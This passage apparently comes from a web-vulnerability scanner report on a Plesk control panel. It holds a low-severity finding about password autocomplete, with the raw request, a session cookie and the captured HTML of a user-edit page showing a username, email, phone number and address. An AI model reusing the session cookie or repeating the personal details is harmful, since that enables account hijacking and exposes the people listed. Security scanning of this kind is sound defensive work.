items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F2' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>Hoyt LLC Research</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId" disabled="1">
<option value="5" label="Owner" selected="selected">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" disabled="disabled" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/3

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /smb/user/edit/id/3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:51:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:51:20 GMT
Connection: close
Content-Length: 45474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
